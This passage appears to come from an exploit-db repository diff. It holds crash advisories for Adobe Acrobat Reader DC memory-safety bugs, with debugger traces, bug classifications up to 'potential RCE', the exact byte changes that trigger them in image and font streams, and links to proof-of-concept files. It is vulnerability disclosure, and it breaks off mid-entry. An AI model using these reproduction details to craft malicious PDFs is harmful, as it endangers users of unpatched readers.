1a 2ad6fb6c 73cf8674 15ab5938 73cf8650 e681ff4b AcroRd32!DllCanUnloadNow+0x188591
1b 2ad6fb80 77285e17 15ab5938 c47e6da9 00000000 KERNEL32!BaseThreadInitThunk+0x24
1c 2ad6fbc8 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f
1d 2ad6fbd8 00000000 0f221540 15ab5938 00000000 ntdll!_RtlUserThreadStart+0x1b
0:014> !heap -p -a 27828ff0
address 27828ff0 found in
_DPH_HEAP_ROOT @ c1a1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
28631e38: 27828ff0 10 - 27828000 2000
? windows_storage!CStorageItemsDataFormat::SetFromStorageItemsArray<Windows::Foundation::Collections::IIterable<Windows::Storage::StorageFolder *>,<lambda_3b893a90b183593f6fe9d34608c3a173> >+b4
66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
7725ccee ntdll!RtlAllocateHeap+0x0000003e
66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
74a2f1f6 ucrtbase!_malloc_base+0x00000026
0f04fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
0f6933e4 AcroRd32!AX_PDXlateToHostEx+0x002e5394
0f692a25 AcroRd32!AX_PDXlateToHostEx+0x002e49d5
0f21a7d9 AcroRd32!DllCanUnloadNow+0x00181819
0f219928 AcroRd32!DllCanUnloadNow+0x00180968
0f2198e6 AcroRd32!DllCanUnloadNow+0x00180926
0f2197c1 AcroRd32!DllCanUnloadNow+0x00180801
0f218788 AcroRd32!DllCanUnloadNow+0x0017f7c8
0f215cd7 AcroRd32!DllCanUnloadNow+0x0017cd17
0f215955 AcroRd32!DllCanUnloadNow+0x0017c995
0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d
0f270753 AcroRd32!CTJPEGDecoderRelease+0x000358c3
0f218184 AcroRd32!DllCanUnloadNow+0x0017f1c4
0f215955 AcroRd32!DllCanUnloadNow+0x0017c995
0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d
0f270753 AcroRd32!CTJPEGDecoderRelease+0x000358c3
0f218184 AcroRd32!DllCanUnloadNow+0x0017f1c4
0f215955 AcroRd32!DllCanUnloadNow+0x0017c995
0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d
0f222848 AcroRd32!DllCanUnloadNow+0x00189888
0f222647 AcroRd32!DllCanUnloadNow+0x00189687
0f221fec AcroRd32!DllCanUnloadNow+0x0018902c
0f221551 AcroRd32!DllCanUnloadNow+0x00188591
73cf8674 KERNEL32!BaseThreadInitThunk+0x00000024
77285e17 ntdll!__RtlUserThreadStart+0x0000002f
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with the PageHeap option in Application Verifier enabled.
- The crash occurs immediately after opening the PDF document.
- The crash occurs inside of the memcpy() function while trying to read from out-of-bounds memory, and its arguments indicate that the program tries to copy 0x30 (48) bytes out of a 0x10-byte heap-based buffer.
- Attached samples: poc1.pdf (crashing file), poc2.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte at offset 0x30b35f, changed from the original value of 0x11 to 0x10 (in the first sample) or to 0x15 (in the second sample). This byte appears to reside inside of a binary JP2K image stream.
- We classify the bug as an information disclosure issue.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47270.zip

144
exploits/windows/dos/47271.txt Normal file
View file

@ -0,0 +1,144 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(2040.5034): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14080e48 ebx=00000000 ecx=148d9d48 edx=00000000 esi=0ec19d20 edi=f0f0f0f0
eip=0f29f04f esp=050faa10 ebp=050faa34 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210286
AcroRd32!AX_PDXlateToHostEx+0x340fff:
0f29f04f 8b4754 mov eax,dword ptr [edi+54h] ds:002b:f0f0f144=????????
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 050faa34 0f29ff1b 16daf6c0 00000001 16a94648 AcroRd32!AX_PDXlateToHostEx+0x340fff
01 050faa50 0f29524b 1812da54 050faa98 0edcafa6 AcroRd32!AX_PDXlateToHostEx+0x341ecb
02 050faa5c 0edcafa6 1812da54 050faefc 16a94648 AcroRd32!AX_PDXlateToHostEx+0x3371fb
03 050faa98 0edca5b8 c0010000 00000008 16a94648 AcroRd32!DllCanUnloadNow+0x181fe6
04 050fab54 0edc9928 050faefc 00000000 a705d59c AcroRd32!DllCanUnloadNow+0x1815f8
05 050faea0 0edc98e6 050faefc 1840e4d8 a705d5e4 AcroRd32!DllCanUnloadNow+0x180968
06 050faed8 0edc97c1 050faefc 1840e4d8 050faf68 AcroRd32!DllCanUnloadNow+0x180926
07 050faf44 0edc8788 c0010000 00000008 1840e4d8 AcroRd32!DllCanUnloadNow+0x180801
08 050fb3a4 0edc5cd7 050fb6a8 14b5884c c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
09 050fcb84 0edc5955 14b5884c c0010000 00000008 AcroRd32!DllCanUnloadNow+0x17cd17
0a 050fcc54 0eda93ed a705b608 1840e4d8 00000000 AcroRd32!DllCanUnloadNow+0x17c995
0b 050fcd34 0ee20753 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
0c 050fcd94 0edc8184 00000000 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3
0d 050fe568 0edc5955 14b587c8 c0010000 00000006 AcroRd32!DllCanUnloadNow+0x17f1c4
0e 050fe638 0eda93ed a7059c24 16a6e638 00000000 AcroRd32!DllCanUnloadNow+0x17c995
0f 050fe718 0eda81e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
10 050fe764 0ed9b383 16a6e638 00000001 00000000 AcroRd32!DllCanUnloadNow+0x15f228
11 050fe8d8 0ed9ac97 18084704 00000001 175d4f70 AcroRd32!DllCanUnloadNow+0x1523c3
12 050fe940 0ed98590 a70592fc 21abd808 0c1d0a28 AcroRd32!DllCanUnloadNow+0x151cd7
13 050fe9c0 0ed9825a 175d4f70 18f82c10 0c1d0a38 AcroRd32!DllCanUnloadNow+0x14f5d0
14 050fe9fc 0ed98192 175d4f70 18f82c10 0c1d0a38 AcroRd32!DllCanUnloadNow+0x14f29a
15 050fea84 0ed9750e 175d4f70 18f82c10 050fecb8 AcroRd32!DllCanUnloadNow+0x14f1d2
16 050feac0 0ed96122 175d4f70 18f82c10 050fecb8 AcroRd32!DllCanUnloadNow+0x14e54e
17 050fed84 0ed95168 175d4f70 050fee18 050fee68 AcroRd32!DllCanUnloadNow+0x14d162
18 050fee88 0ed94375 175d4f70 050fefb8 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8
19 050fefdc 0ed934ba 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5
1a 050ff03c 0ed9334d 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa
1b 050ff05c 0ed91f3c 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14a38d
1c 050ff114 0ed91962 00000001 00000000 a7058a50 AcroRd32!DllCanUnloadNow+0x148f7c
1d 050ff16c 0ed9177a 181d3680 00000001 a7058aec AcroRd32!DllCanUnloadNow+0x1489a2
1e 050ff1d0 0ed914ff 050ff2c4 a70589d8 18eb9920 AcroRd32!DllCanUnloadNow+0x1487ba
1f 050ff2e4 0ec566ec 18eb9920 0ec56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f
20 050ff2fc 0ec5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c
21 050ff318 7460e0bb 00300dd4 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f
22 050ff344 74618849 0ec563a0 00300dd4 0000000f USER32!_InternalCallWinProc+0x2b
23 050ff368 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
24 050ff438 74608503 0ec563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
25 050ff4a0 74608aa0 0d749a40 00000000 0000000f USER32!DispatchClientMessage+0x1b3
26 050ff4e8 77291a6d 050ff504 00000020 050ff568 USER32!__fnDWORD+0x50
27 050ff520 76e92d3c 746091ee 050ff5b8 ba389ade ntdll!KiUserCallbackDispatcher+0x4d
28 050ff524 746091ee 050ff5b8 ba389ade 0cfaf370 win32u!NtUserDispatchMessage+0xc
29 050ff578 74608c20 bf376fa6 050ff59c 0ec6da8b USER32!DispatchMessageWorker+0x5be
2a 050ff584 0ec6da8b 050ff5b8 0cfaf370 0cfaf370 USER32!DispatchMessageW+0x10
2b 050ff59c 0ec6d81e 050ff5b8 a7058d2c 0cfaf370 AcroRd32!DllCanUnloadNow+0x24acb
2c 050ff610 0ec6d6b4 a7058d74 0cfaf370 00000000 AcroRd32!DllCanUnloadNow+0x2485e
2d 050ff648 0ebfc556 a7058d84 0cf98070 00000000 AcroRd32!DllCanUnloadNow+0x246f4
2e 050ff6b8 0ebfbf81 0ebd0000 00af0000 0cf98070 AcroRd32!AcroWinMainSandbox+0x756
2f 050ffad8 00af783d 0ebd0000 00af0000 0cf98070 AcroRd32!AcroWinMainSandbox+0x181
30 050ffea4 00bffd2a 00af0000 00000000 0c112f0a AcroRd32_exe+0x783d
31 050ffef0 73cf8674 04ecb000 73cf8650 40982fa7 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
32 050fff04 77285e17 04ecb000 393e3559 00000000 KERNEL32!BaseThreadInitThunk+0x24
33 050fff4c 77285de7 ffffffff 772aad8c 00000000 ntdll!__RtlUserThreadStart+0x2f
34 050fff5c 00000000 00af1390 04ecb000 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> u eip-7
AcroRd32!AX_PDXlateToHostEx+0x340ff8:
0f29f048 8b7804 mov edi,dword ptr [eax+4]
0f29f04b 85ff test edi,edi
0f29f04d 7441 je AcroRd32!AX_PDXlateToHostEx+0x341040 (0f29f090)
0f29f04f 8b4754 mov eax,dword ptr [edi+54h]
0f29f052 8945e8 mov dword ptr [ebp-18h],eax
0f29f055 8b4738 mov eax,dword ptr [edi+38h]
0f29f058 85c0 test eax,eax
0f29f05a 741c je AcroRd32!AX_PDXlateToHostEx+0x341028 (0f29f078)
0:000> dd eax
14080e48 f0f0f0f0 f0f0f0f0 a0a0a0a0 a0a0a0a0
14080e58 00000000 00000000 d3b8376a 101b7bae
14080e68 abcdaaa9 8bfc1000 00000028 00000050
14080e78 00000002 16fdf310 0b043584 dcbaaaa9
14080e88 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
14080e98 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
14080ea8 f0f0f0f0 f0f0f0f0 a0a0a0a0 a0a0a0a0
14080eb8 00000000 00000000 d4b8376d 101b7baa
0:000> !heap -p -a eax
address 14080e48 found in
_HEAP @ c110000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
14080e20 0008 0000 [00] 14080e48 00008 - (free DelayedFree)
66d6c396 verifier!AVrfpDphNormalHeapFree+0x000000b6
66d6ab43 verifier!AVrfDebugPageHeapFree+0x000000e3
77305359 ntdll!RtlDebugFreeHeap+0x0000003c
7725ad86 ntdll!RtlpFreeHeap+0x000000d6
7725ac3d ntdll!RtlFreeHeap+0x000007cd
66e5aad0 vrfcore!VfCoreRtlFreeHeap+0x00000020
74a2db1b ucrtbase!_free_base+0x0000001b
74a2dae8 ucrtbase!free+0x00000018
ec02849 AcroRd32!AcroWinMainSandbox+0x00006a49
1a0e8706 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000286
1a0d0e0a JP2KLib!JP2KCopyRect+0x0000bc0a
1a0e7904 JP2KLib!JP2KImageInitDecoderEx+0x00000024
f29f8e8 AcroRd32!AX_PDXlateToHostEx+0x00341898
f2a1508 AcroRd32!AX_PDXlateToHostEx+0x003434b8
f29522b AcroRd32!AX_PDXlateToHostEx+0x003371db
f29f164 AcroRd32!AX_PDXlateToHostEx+0x00341114
edcaf85 AcroRd32!DllCanUnloadNow+0x00181fc5
edca5b8 AcroRd32!DllCanUnloadNow+0x001815f8
edc9928 AcroRd32!DllCanUnloadNow+0x00180968
edc98e6 AcroRd32!DllCanUnloadNow+0x00180926
edc97c1 AcroRd32!DllCanUnloadNow+0x00180801
edc8788 AcroRd32!DllCanUnloadNow+0x0017f7c8
edc5cd7 AcroRd32!DllCanUnloadNow+0x0017cd17
edc5955 AcroRd32!DllCanUnloadNow+0x0017c995
eda93ed AcroRd32!DllCanUnloadNow+0x0016042d
ee20753 AcroRd32!CTJPEGDecoderRelease+0x000358c3
edc8184 AcroRd32!DllCanUnloadNow+0x0017f1c4
edc5955 AcroRd32!DllCanUnloadNow+0x0017c995
eda93ed AcroRd32!DllCanUnloadNow+0x0016042d
eda81e8 AcroRd32!DllCanUnloadNow+0x0015f228
ed9b383 AcroRd32!DllCanUnloadNow+0x001523c3
ed9ac97 AcroRd32!DllCanUnloadNow+0x00151cd7
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10. Reproduces most cleanly with Light PageHeap enabled in Application Verifier for the AcroRd32.exe process (which fills freed allocations with 0xf0f0f0...). Without PageHeap, the crash typically occurs in ntdll!RtlReportCriticalFailure.
- The crash occurs immediately after opening the PDF document. It is a use-after-free condition which subsequently leads to memory corruption.
- Attached samples: poc1.pdf and poc2.pdf (crashing files), original1.pdf and original2.pdf (corresponding original files).
- We have minimized the differences between the original and mutated files down to 2 bytes inside of binary JP2 image streams. For poc1.pdf, the modifications are at offsets 0x290a and 0x298b; for poc2.pdf, at offsets 0x5b4 and 0x62a.
- We classify the bug as a potential RCE.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47271.zip

49
exploits/windows/dos/47272.txt Normal file
View file

@ -0,0 +1,49 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(36ec.3210): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=fffff987 ebx=f8519200 ecx=290cc000 edx=290c8fbc esi=28f43098 edi=fffff851
eip=645412f9 esp=1390d9e4 ebp=00000014 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
AGM!AGMInitialize+0x584c9:
645412f9 8911 mov dword ptr [ecx],edx ds:002b:290cc000=????????
0:023> !heap -p -a ecx-8
address 290cbff8 found in
_DPH_HEAP_ROOT @ bc51000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
bc53d9c: 28c10090 4bbf70 - 28c10000 4bd000
66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
7725ccee ntdll!RtlAllocateHeap+0x0000003e
66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
74a2f1f6 ucrtbase!_malloc_base+0x00000026
0e75fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
64531c72 AGM!AGMInitialize+0x00048e42
0:023> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 1390da28 77240a31 07bb5958 64540190 1390daac AGM!AGMInitialize+0x584c9
01 1390da9c 74a2f1f6 f238e0c0 07bb5958 0dc0fc40 ntdll!RtlCaptureStackBackTrace+0x41
02 1390dab8 0e75fcd9 004bbf70 0e75fcc0 6451f0bd ucrtbase!_malloc_base+0x26
03 1390db54 6451e588 12b91f98 0000047b 00000001 AcroRd32!AcroWinMainSandbox+0x3ed9
04 1390db58 12b91f98 0000047b 00000001 00000000 AGM!AGMInitialize+0x35758
05 1390db5c 00000000 00000001 00000000 17191e14 0x12b91f98
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled. Without PageHeap, the crash may also be triggered in ntdll!RtlReportCriticalFailure, if the system allocator detects a corrupted chunk.
- The crash is caused by a heap-based buffer overflow and occurs immediately after opening the PDF document (poc1.pdf), or with a bit of interaction (scrolling to other pages, zooming in and out) for poc2.pdf and poc3.pdf.
- We classify the bug as a potential RCE.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47272.zip

73
exploits/windows/dos/47273.txt Normal file
View file

@ -0,0 +1,73 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(188c.47fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10868d40 ebx=00001acb ecx=00001aca edx=1086cd54 esi=1086d4d8 edi=1086cd20
eip=1065d2a0 esp=19d5db40 ebp=19d5db70 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
CoolType!CTCleanup+0x22e92:
1065d2a0 89048e mov dword ptr [esi+ecx*4],eax ds:002b:10874000=00000000
0:023> !address esi
[...]
Usage: Image
Base Address: 10867000
End Address: 10874000
Region Size: 0000d000 ( 52.000 kB)
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 01000000 MEM_IMAGE
Allocation Base: 105c0000
Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY
Image Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\CoolType.dll
Module Name: CoolType
Loaded Image Name: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\CoolType.dll
Mapped Image Name:
More info: lmv m CoolType
More info: !lmi CoolType
More info: ln 0x1086d4d8
More info: !dh 0x105c0000
0:023> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 19d5db70 1065d214 1086cd20 1086d4d8 00000f5c CoolType!CTCleanup+0x22e92
01 19d5dbac 1065dabd 1086d4a0 0000000e 1086d4d8 CoolType!CTCleanup+0x22e06
02 19d5dbec 10668219 18187fb8 1086cca0 10868e60 CoolType!CTCleanup+0x236af
03 19d5dc20 10608e68 18187bb8 19d5e69c 00000f5c CoolType!CTCleanup+0x2de0b
04 19d5e344 10604051 18187bb8 19d5e5d4 19d5e754 CoolType!CTInit+0x460e1
05 19d5e428 1063e7bb 18187bb8 19d5e5d4 19d5e754 CoolType!CTInit+0x412ca
06 19d5e580 1063e47f 18187bb8 19d5e754 19d5e724 CoolType!CTCleanup+0x43ad
07 19d5e5fc 106169cd 18187bb8 108700a0 19d5e754 CoolType!CTCleanup+0x4071
08 19d5e7c4 1061619f 19d5e9b4 00000000 10870350 CoolType!CTInit+0x53c46
09 19d5e894 10615091 00000000 00000001 00000001 CoolType!CTInit+0x53418
0a 19d5ec5c 10614728 0000000c 16589e94 0000e94c CoolType!CTInit+0x5230a
0b 19d5ec9c 10613751 16589de8 0000000b 19d5ed2c CoolType!CTInit+0x519a1
0c 19d5ee08 106132e4 19d5f220 19d5f59c 0000044a CoolType!CTInit+0x509ca
0d 19d5ee5c 64552182 165486c4 19d5f220 19d5f59c CoolType!CTInit+0x5055d
0e 19d5f1a4 64550fc8 207ecb1c 19d5f220 19d5f59c AGM!AGMInitialize+0x69352
0f 19d5f304 6451bcd0 19d5f36c 207ecab8 19d5f634 AGM!AGMInitialize+0x68198
10 19d5f3a0 64523f0a 19d5f584 207ecab8 19d5f634 AGM!AGMInitialize+0x32ea0
11 19d5f5cc 64522370 1730d0d0 14293a90 207ecab8 AGM!AGMInitialize+0x3b0da
12 19d5f7a8 64520dec 1730d0d0 14293a90 e0be67fc AGM!AGMInitialize+0x39540
13 19d5f7f4 6454ffbf 1730d0d0 14293a90 207b2388 AGM!AGMInitialize+0x37fbc
14 19d5f818 6454fa3e 00000004 6454fb7f 14293a90 AGM!AGMInitialize+0x6718f
15 00000000 00000000 00000000 00000000 00000000 AGM!AGMInitialize+0x66c0e
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled.
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of a static buffer in the CoolType.dll library.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to two bytes at offset 0x123bff, changed from the original values of 0xC0 0x95 to 0xFF 0x7F. These bytes reside inside of a CFF font stream.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47273.zip

94
exploits/windows/dos/47274.txt Normal file
View file

@ -0,0 +1,94 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(50a8.4100): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ff3a0000 ebx=00003f11 ecx=00002000 edx=00000001 esi=0077bdfc edi=8c9e5000
eip=64b40fb5 esp=0077bdc0 ebp=0077be18 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoolType!CTCleanup+0x26ba7:
64b40fb5 894704 mov dword ptr [edi+4],eax ds:002b:8c9e5004=????????
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0077be18 64b05405 64d48440 8605cdcc 00000001 CoolType!CTCleanup+0x26ba7
01 0077be34 64b04548 64d48284 27618cb0 0077c5e8 CoolType!CTInit+0x6267e
02 0077be44 64b10fa7 0077be94 64d50130 0077be88 CoolType!CTInit+0x617c1
03 0077c5e8 64b107bf 8605cdcc 0077c60c 0077c6a8 CoolType!CTInit+0x6e220
04 0077c6a0 64b10736 8d3a8ff8 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6da38
05 0077c6b4 64b106c3 8605cd70 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6d9af
06 0077c6c8 64b1051c 8605cd70 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6d93c
07 0077c70c 64b10398 0077c7ec 5f8bc1ec 0077c7b0 CoolType!CTInit+0x6d795
08 0077c738 64b1032b 0077c7ec 5f8bc1b4 0077c7b0 CoolType!CTInit+0x6d611
09 0077c760 64b10208 8c3c8ff0 0077c7ec 5f8bc144 CoolType!CTInit+0x6d5a4
0a 0077c790 64adb3c0 8c3c8ff0 0077c7ec 5f8bcf58 CoolType!CTInit+0x6d481
0b 0077c98c 64ac036d 8605cd70 0077c9c4 5f8bcf3c CoolType!CTInit+0x38639
0c 0077c9e8 64ac1c20 64d31918 00000001 00000000 CoolType!CTInit+0x1d5e6
0d 0077ca18 64ac5eff 8605cd70 64d31918 00000001 CoolType!CTInit+0x1ee99
0e 0077ca54 64ac036d 8605cd70 0077ca8c 5f8bcc64 CoolType!CTInit+0x23178
0f 0077cab0 64ac1c20 64d319d0 00000001 00000000 CoolType!CTInit+0x1d5e6
10 0077cae0 64ac2229 8605cd70 64d319d0 00000001 CoolType!CTInit+0x1ee99
11 0077cb14 64ac5c4d 64d319d0 92280fc8 00000004 CoolType!CTInit+0x1f4a2
12 0077cb4c 64ac32ba 8ce40fc0 5f8bd684 0077d138 CoolType!CTInit+0x22ec6
13 0077d050 64ac31b3 8605cd70 8ce40fc0 0077d0b0 CoolType!CTInit+0x20533
14 0077d088 64ac2ef7 8605cd70 8ce40fc0 0077d0b0 CoolType!CTInit+0x2042c
15 0077d0cc 64ac2d85 0077d1a0 00000000 8605cd00 CoolType!CTInit+0x20170
16 0077d10c 64acdad7 0077d1a0 8ce40fc0 00000000 CoolType!CTInit+0x1fffe
17 0077d168 64acd96f 0077d1a0 8ce40fc0 91bbb002 CoolType!CTInit+0x2ad50
18 0077d1b8 123bf455 8cae2f08 64d32280 91bbb002 CoolType!CTInit+0x2abe8
19 0077d1dc 123be4e2 91bbb002 00000007 00000000 AcroRd32!DllCanUnloadNow+0x176495
1a 0077e544 123ba692 0077e690 8b972f68 00000004 AcroRd32!DllCanUnloadNow+0x175522
1b 0077e72c 123ba2fe 0077e740 91b7ea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2
1c 0077e780 123b655c 0077e810 8b972f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e
1d 0077e838 123a93ed b7e1e317 78d62f78 00000000 AcroRd32!DllCanUnloadNow+0x16d59c
1e 0077e918 123a81e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
1f 0077e964 1239b383 78d62f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228
20 0077ead8 1239ac97 9096fdbc 00000001 870c2ef8 AcroRd32!DllCanUnloadNow+0x1523c3
21 0077eb40 12398590 b7e1e1cf 96476e74 870c2ef8 AcroRd32!DllCanUnloadNow+0x151cd7
22 0077ebc0 1239825a 870c2ef8 8de26f40 96476e44 AcroRd32!DllCanUnloadNow+0x14f5d0
23 0077ebfc 12416099 870c2ef8 8de26f40 96476e44 AcroRd32!DllCanUnloadNow+0x14f29a
24 0077ecd4 124157f9 8ae88fc8 00000000 8de26f40 AcroRd32!CTJPEGDecoderRelease+0x2b209
25 0077ed14 12415717 8ae88fc8 00000000 8de26f40 AcroRd32!CTJPEGDecoderRelease+0x2a969
26 0077ed4c 12415669 00000000 8de26f40 0077eecc AcroRd32!CTJPEGDecoderRelease+0x2a887
27 0077ed68 124151ec 8de26f40 0077eecc 0077eee4 AcroRd32!CTJPEGDecoderRelease+0x2a7d9
28 0077ef30 12414a8c 00000009 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c
29 0077f150 124147d4 124147a0 8991cf90 0077f1a8 AcroRd32!CTJPEGDecoderRelease+0x29bfc
2a 0077f160 1226ed79 8d2061b8 b7e1fba7 8b612ff8 AcroRd32!CTJPEGDecoderRelease+0x29944
2b 0077f1a8 1226e83d 00000744 b7e1f817 15861fd8 AcroRd32!DllCanUnloadNow+0x25db9
2c 0077f218 1226e5d4 b7e1f84f 15861fd8 1226e560 AcroRd32!DllCanUnloadNow+0x2587d
2d 0077f240 12204709 000004d3 00000000 12204270 AcroRd32!DllCanUnloadNow+0x25614
2e 0077f25c 7460e0bb 00bc0f52 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909
2f 0077f288 74618849 12204270 00bc0f52 00000113 USER32!_InternalCallWinProc+0x2b
30 0077f2ac 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20
31 0077f37c 746090dc 12204270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be
32 0077f3e8 74608c20 1a382cee 0077f40c 1226da8b USER32!DispatchMessageWorker+0x4ac
33 0077f3f4 1226da8b 0077f428 1583ddd8 1583ddd8 USER32!DispatchMessageW+0x10
34 0077f40c 1226d81e 0077f428 b7e1fe8f 1583ddd8 AcroRd32!DllCanUnloadNow+0x24acb
35 0077f480 1226d6b4 b7e1feb7 1583ddd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e
36 0077f4b8 121fc556 b7e1ff27 1458cff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4
37 0077f528 121fbf81 121d0000 00af0000 1458cff8 AcroRd32!AcroWinMainSandbox+0x756
38 0077f948 00af783d 121d0000 00af0000 1458cff8 AcroRd32!AcroWinMainSandbox+0x181
39 0077fd14 00bffd2a 00af0000 00000000 0b6db3ba AcroRd32_exe+0x783d
3a 0077fd60 73cf8674 0041d000 73cf8650 be42f918 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
3b 0077fd74 77285e17 0041d000 11e63d34 00000000 KERNEL32!BaseThreadInitThunk+0x24
3c 0077fdbc 77285de7 ffffffff 772aadae 00000000 ntdll!__RtlUserThreadStart+0x2f
3d 0077fdcc 00000000 00af1390 0041d000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more consistently with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer.
- It seems to be an off-by-one error, leading to an 8-byte overflow.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to two bytes at offsets 0x3f523 and 0x40123 (0x65 => 0x75 and 0x15 => 0x05). These bytes reside inside of a Type 1 font stream.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47274.zip

104
exploits/windows/dos/47275.txt Normal file
View file

@ -0,0 +1,104 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(3fb8.2ac4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02c50000 ebx=57694ff0 ecx=00000004 edx=00111111 esi=57695010 edi=0000001b
eip=13b51c4e esp=668dd318 ebp=668dd378 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoolType!CTInit+0x6eec7:
13b51c4e 8906 mov dword ptr [esi],eax ds:002b:57695010=????????
0:018> !heap -p -a @esi-20
address 57694ff0 found in
